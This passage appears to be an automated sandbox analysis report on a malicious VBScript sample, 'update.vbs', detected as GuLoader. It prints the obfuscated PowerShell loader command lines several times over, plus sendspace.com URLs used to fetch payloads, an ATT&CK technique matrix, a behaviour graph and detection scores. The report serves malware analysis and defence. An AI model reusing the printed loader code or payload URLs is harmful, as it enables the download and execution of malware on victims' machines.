f.lkt thic d sse-derripedifiaorgantprovih .jen per.etdisse: tykn\betondsk.kkioverimsti,lyurban.lakfatfi,kexvr,retbygrn skave-grassvfejlfadiplol san u b egejosfl bombe$lab.adnoncoowooleu gemarudso.nenerge ap.ssflossspreh,e kommsapoko; ,top ');ratlaasene (concolor 'mout.i dambflor.e wiver(adscittrocte foras leoptal al- leiopplastaoverftretarh tour bugsetsulai: tran\w,ssedappleishab,mtil.sysmnde.unadutrligsx ekstt trep)marke{whiteed.bstxposthioplbetbes,a}.onre;overs ');$unensouled = concolor 'tu,liefrknec palmhbla,kola el .erde% hantaoraklpgodtepfrancdvarmeamaggituntemabedri%beslu\underamucoscflskeeratiot ungry kakol deramovertebourotpa,eih sognygrissltilbycknl.dame.virforh bf.riniwal,inforuromisi.lrdstj. ,urrrusseloskndinrende d,mit& ossa& flam lyskoevul,scgdninh acetoenerg skr.p$stade ';ratlaasene (concolor 'gr nd$ ind,g.dhullvoda.odespob freda pte,lhedg,:w.llspsp bra reg,g kab,au,sidn deciihologsy,lloh,ende7misco3apo.i=aya o(b.slac crakmtvistdch,rd cubby/honeyconsla auric$ c.rausluednhexacedesinnme,dosanenco du.auman.ali,trae rentd kuve)flere ');ratlaasene (concolor ' ggep$o tspggunmal po tochamob ts.racan,llparad:operajwasteuomstyb sterihavgalstrikano petdeodoo ef.erforpoypaabu= obse$v.agmbdiploo op ygmed,tbhazaria,aryntoecadeks.ee ,lepr hjskisuper.catapstunenpte.nglunbeliserpet.erip(,mora$ prempdeuterskruma ads,kak,ierrgskyioverdt be.aiprebr)svovl ');$bogbinderi=$jubilatory[0];ratlaasen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$vastities='su';$vastities+='bstrin';$vastities+='g';function concolor($weaselly){$genoptagelserne=$weaselly.length-$verdensfjerneconomatic;for($verdensfjerne=5;$verdensfjerne -lt $genoptagelserne;$verdensfjerne+=6){$tetanuses+=$weaselly.$vastities.invoke( $verdensfjerne, $verdensfjerneconomatic);}$tetanuses;}function ratlaasene($kontrasts){& ($protektionerne) ($kontrasts);}$zemas=concolor 'ka,rimmisalofor,azret.si ,ymplexponld.scoaforts/rug,k5cirku.hyp,t0stimu runds( annuwsavori cardnreguld reecohvi.ewantissprea so,mnkd,ontprodu non,l1autoe0kamer.i.otr0trans;rejse inn.wpres.ib,kenn trkn6stift4super; ef e hi,loxudst 6rygel4quidd;termo pensrprotevsiali: semi1 over2marsi1tmrer.konto0 aria),msae jeergsolodekunstcfaberk frakohypos/ lowp2tridk0bogca1vas,e0damas0 ervi1finge0diphe1stage k mplfmann iswashr g,ute,udsjfcanceofrustxsmin /premi1bered2porce1 xeno.voxe,0antip ';$egenartets=concolor 'bathmu morgsetuieemarksrdepic-haanlasagtmgathalesplitnfore,t ther ';$bogbinderi=concolor '.engehpolytttangltov rapbridgs tact:grund/optog/snkniw,rickwaftrywdevot.sregnsp rsoelnmo,n sandd .ymmsd flopdysuradaarlcvandfeimipr.bottlc af,eo n mamantid/ b.skppokinr .nsooyvonn/exs.fd ,niflprste/monop7 ightdvulcahacantiskannd .mmu7spawn ';$prakriti=concolor 'fangs>neigh ';$protektionerne=concolor 'damesigr.fie homoxm,til ';$dournesses='forureningskildens';ratlaasene (concolor 'natiosnyt iesammetpea.a-bedl,cnont o frognanskatlivreeassonn f.lkt thic d sse-derripedifiaorgantprovih .jen per.etdisse: tykn\betondsk.kkioverimsti,lyurban.lakfatfi,kexvr,retbygrn skave-grassvfejlfadiplol san u b egejosfl bombe$lab.adnoncoowooleu gemarudso.nenerge ap.ssflossspreh,e kommsapoko; ,top ');ratlaasene (concolor 'mout.i dambflor.e wiver(adscittrocte foras leoptal al- leiopplastaoverftretarh tour bugsetsulai: tran\w,ssedappleishab,mtil.sysmnde.unadutrligsx ekstt trep)marke{whiteed.bstxposthioplbetbes,a}.onre;overs ');$unensouled = concolor 'tu,liefrknec palmhbla,kola el .erde% hantaoraklpgodtepfrancdvarmeamaggituntemabedri%beslu\underamucoscflskeeratiot ungry kakol deramovertebourotpa,eih sognygrissltilbycknl.dame.virforh bf.riniwal,inforuromisi.lrdstj. ,urrrusseloskndinrende d,mit& ossa& flam lyskoevul,scgdninh acetoenerg skr.p$stade ';ratlaasene (concolor 'gr nd$ ind,g.dhullvoda.odespob freda pte,lhedg,:w.llspsp bra reg,g kab,au,sidn deciihologsy,lloh,ende7misco3apo.i=aya o(b.slac crakmtvistdch,rd cubby/honeyconsla auric$ c.rausluednhexacedesinnme,dosanenco du.auman.ali,trae rentd kuve)flere ');ratlaasene (concolor ' ggep$o tspggunmal po tochamob ts.racan,llparad:operajwasteuomstyb sterihavgalstrikano petdeodoo ef.erforpoypaabu= obse$v.agmbdiploo op ygmed,tbhazaria,aryntoecadeks.ee ,lepr hjskisuper.catapstunenpte.nglunbeliserpet.erip(,mora$ prempdeuterskruma ads,kak,ierrgskyioverdt be.aiprebr)svovl ');$bogbinderi=$jubilatory[0];ratlaasen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$vastities='su';$vastities+='bstrin';$vastities+='g';function concolor($weaselly){$genoptagelserne=$weaselly.length-$verdensfjerneconomatic;for($verdensfjerne=5;$verdensfjerne -lt $genoptagelserne;$verdensfjerne+=6){$tetanuses+=$weaselly.$vastities.invoke( $verdensfjerne, $verdensfjerneconomatic);}$tetanuses;}function ratlaasene($kontrasts){& ($protektionerne) ($kontrasts);}$zemas=concolor 'ka,rimmisalofor,azret.si ,ymplexponld.scoaforts/rug,k5cirku.hyp,t0stimu runds( annuwsavori cardnreguld reecohvi.ewantissprea so,mnkd,ontprodu non,l1autoe0kamer.i.otr0trans;rejse inn.wpres.ib,kenn trkn6stift4super; ef e hi,loxudst 6rygel4quidd;termo pensrprotevsiali: semi1 over2marsi1tmrer.konto0 aria),msae jeergsolodekunstcfaberk frakohypos/ lowp2tridk0bogca1vas,e0damas0 ervi1finge0diphe1stage k mplfmann iswashr g,ute,udsjfcanceofrustxsmin /premi1bered2porce1 xeno.voxe,0antip ';$egenartets=concolor 'bathmu morgsetuieemarksrdepic-haanlasagtmgathalesplitnfore,t ther ';$bogbinderi=concolor '.engehpolytttangltov rapbridgs tact:grund/optog/snkniw,rickwaftrywdevot.sregnsp rsoelnmo,n sandd .ymmsd flopdysuradaarlcvandfeimipr.bottlc af,eo n mamantid/ b.skppokinr .nsooyvonn/exs.fd ,niflprste/monop7 ightdvulcahacantiskannd .mmu7spawn ';$prakriti=concolor 'fangs>neigh ';$protektionerne=concolor 'damesigr.fie homoxm,til ';$dournesses='forureningskildens';ratlaasene (concolor 'natiosnyt iesammetpea.a-bedl,cnont o frognanskatlivreeassonn f.lkt thic d sse-derripedifiaorgantprovih .jen per.etdisse: tykn\betondsk.kkioverimsti,lyurban.lakfatfi,kexvr,retbygrn skave-grassvfejlfadiplol san u b egejosfl bombe$lab.adnoncoowooleu gemarudso.nenerge ap.ssflossspreh,e kommsapoko; ,top ');ratlaasene (concolor 'mout.i dambflor.e wiver(adscittrocte foras leoptal al- leiopplastaoverftretarh tour bugsetsulai: tran\w,ssedappleishab,mtil.sysmnde.unadutrligsx ekstt trep)marke{whiteed.bstxposthioplbetbes,a}.onre;overs ');$unensouled = concolor 'tu,liefrknec palmhbla,kola el .erde% hantaoraklpgodtepfrancdvarmeamaggituntemabedri%beslu\underamucoscflskeeratiot ungry kakol deramovertebourotpa,eih sognygrissltilbycknl.dame.virforh bf.riniwal,inforuromisi.lrdstj. ,urrrusseloskndinrende d,mit& ossa& flam lyskoevul,scgdninh acetoenerg skr.p$stade ';ratlaasene (concolor 'gr nd$ ind,g.dhullvoda.odespob freda pte,lhedg,:w.llspsp bra reg,g kab,au,sidn deciihologsy,lloh,ende7misco3apo.i=aya o(b.slac crakmtvistdch,rd cubby/honeyconsla auric$ c.rausluednhexacedesinnme,dosanenco du.auman.ali,trae rentd kuve)flere ');ratlaasene (concolor ' ggep$o tspggunmal po tochamob ts.racan,llparad:operajwasteuomstyb sterihavgalstrikano petdeodoo ef.erforpoypaabu= obse$v.agmbdiploo op ygmed,tbhazaria,aryntoecadeks.ee ,lepr hjskisuper.catapstunenpte.nglunbeliserpet.erip(,mora$ prempdeuterskruma ads,kak,ierrgskyioverdt be.aiprebr)svovl ');$bogbinderi=$jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$vastities='su';$vastities+='bstrin';$vastities+='g';function concolor($weaselly){$genoptagelserne=$weaselly.length-$verdensfjerneconomatic;for($verdensfjerne=5;$verdensfjerne -lt $genoptagelserne;$verdensfjerne+=6){$tetanuses+=$weaselly.$vastities.invoke( $verdensfjerne, $verdensfjerneconomatic);}$tetanuses;}function ratlaasene($kontrasts){& ($protektionerne) ($kontrasts);}$zemas=concolor 'ka,rimmisalofor,azret.si ,ymplexponld.scoaforts/rug,k5cirku.hyp,t0stimu runds( annuwsavori cardnreguld reecohvi.ewantissprea so,mnkd,ontprodu non,l1autoe0kamer.i.otr0trans;rejse inn.wpres.ib,kenn trkn6stift4super; ef e hi,loxudst 6rygel4quidd;termo pensrprotevsiali: semi1 over2marsi1tmrer.konto0 aria),msae jeergsolodekunstcfaberk frakohypos/ lowp2tridk0bogca1vas,e0damas0 ervi1finge0diphe1stage k mplfmann iswashr g,ute,udsjfcanceofrustxsmin /premi1bered2porce1 xeno.voxe,0antip ';$egenartets=concolor 'bathmu morgsetuieemarksrdepic-haanlasagtmgathalesplitnfore,t ther ';$bogbinderi=concolor '.engehpolytttangltov rapbridgs tact:grund/optog/snkniw,rickwaftrywdevot.sregnsp rsoelnmo,n sandd .ymmsd flopdysuradaarlcvandfeimipr.bottlc af,eo n mamantid/ b.skppokinr .nsooyvonn/exs.fd ,niflprste/monop7 ightdvulcahacantiskannd .mmu7spawn ';$prakriti=concolor 'fangs>neigh ';$protektionerne=concolor 'damesigr.fie homoxm,til ';$dournesses='forureningskildens';ratlaasene (concolor 'natiosnyt iesammetpea.a-bedl,cnont o frognanskatlivreeassonn f.lkt thic d sse-derripedifiaorgantprovih .jen per.etdisse: tykn\betondsk.kkioverimsti,lyurban.lakfatfi,kexvr,retbygrn skave-grassvfejlfadiplol san u b egejosfl bombe$lab.adnoncoowooleu gemarudso.nenerge ap.ssflossspreh,e kommsapoko; ,top ');ratlaasene (concolor 'mout.i dambflor.e wiver(adscittrocte foras leoptal al- leiopplastaoverftretarh tour bugsetsulai: tran\w,ssedappleishab,mtil.sysmnde.unadutrligsx ekstt trep)marke{whiteed.bstxposthioplbetbes,a}.onre;overs ');$unensouled = concolor 'tu,liefrknec palmhbla,kola el .erde% hantaoraklpgodtepfrancdvarmeamaggituntemabedri%beslu\underamucoscflskeeratiot ungry kakol deramovertebourotpa,eih sognygrissltilbycknl.dame.virforh bf.riniwal,inforuromisi.lrdstj. ,urrrusseloskndinrende d,mit& ossa& flam lyskoevul,scgdninh acetoenerg skr.p$stade ';ratlaasene (concolor 'gr nd$ ind,g.dhullvoda.odespob freda pte,lhedg,:w.llspsp bra reg,g kab,au,sidn deciihologsy,lloh,ende7misco3apo.i=aya o(b.slac crakmtvistdch,rd cubby/honeyconsla auric$ c.rausluednhexacedesinnme,dosanenco du.auman.ali,trae rentd kuve)flere ');ratlaasene (concolor ' ggep$o tspggunmal po tochamob ts.racan,llparad:operajwasteuomstyb sterihavgalstrikano petdeodoo ef.erforpoypaabu= obse$v.agmbdiploo op ygmed,tbhazaria,aryntoecadeks.ee ,lepr hjskisuper.catapstunenpte.nglunbeliserpet.erip(,mora$ prempdeuterskruma ads,kak,ierrgskyioverdt be.aiprebr)svovl ');$bogbinderi=$jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446633 Sample: update.vbs Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 28 www.sendspace.com 2->28 30 fs13n1.sendspace.com 2->30 32 fs03n2.sendspace.com 2->32 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 Yara detected GuLoader 2->48 50 3 other signatures 2->50 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 52 VBScript performs obfuscated calls to suspicious functions 9->52 54 Suspicious powershell command line found 9->54 56 Wscript starts Powershell (via cmd or directly) 9->56 58 3 other signatures 9->58 12 powershell.exe 14 19 9->12         started        process6 dnsIp7 36 fs13n1.sendspace.com 69.31.136.57, 443, 49705 GTT-BACKBONEGTTDE United States 12->36 38 www.sendspace.com 104.21.28.80, 443, 49704, 49713 CLOUDFLARENETUS United States 12->38 60 Suspicious powershell command line found 12->60 62 Very long command line found 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 16 powershell.exe 16 12->16         started        19 conhost.exe 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 40 Writes to foreign memory regions 16->40 42 Found suspicious powershell code related to unpacking or dynamic code loading 16->42 23 wab.exe 16 16->23         started        26 cmd.exe 1 16->26         started        process11 dnsIp12 34 fs03n2.sendspace.com 69.31.136.17, 443, 49714 GTT-BACKBONEGTTDE United States 23->34

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              update.vbs8%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.sendspace.com/pro/dl/medjl10%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/m0%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              http://fs13n1.sendspace.com0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/7dhid70%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/.0%Avira URL Cloudsafe
              https://www.sendspace.com/IwX0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin0%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/om:443l0%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/7dhid7P0%Avira URL Cloudsafe
              https://www.sendspace.com/0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/7dhid7XR0%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/0%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr1190%Avira URL Cloudsafe
              https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp0%Avira URL Cloudsafe
              https://fs13n1.sendspaX0%Avira URL Cloudsafe
              https://fs13n1.sendspace.com0%Avira URL Cloudsafe
              https://fs13n1.sendspace.com00%Avira URL Cloudsafe
              http://crl.microt0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs03n2.sendspace.com
              		69.31.136.17
              		truefalse
                		unknown
                www.sendspace.com
                		104.21.28.80
                		truefalse
                  		unknown
                  fs13n1.sendspace.com
                  		69.31.136.57
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.sendspace.com/pro/dl/medjl1false
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/7dhid7false
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.binfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://fs13n1.sendspace.compowershell.exe, 00000002.00000002.2635114145.0000026F2FE42000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://go.micropowershell.exe, 00000002.00000002.2635114145.0000026F30E0B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/IwXwab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n2.sendspace.com/.wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n2.sendspace.com/mwab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sendspace.compowershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.compowershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F3192E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.binwab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n2.sendspace.com/om:443lwab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
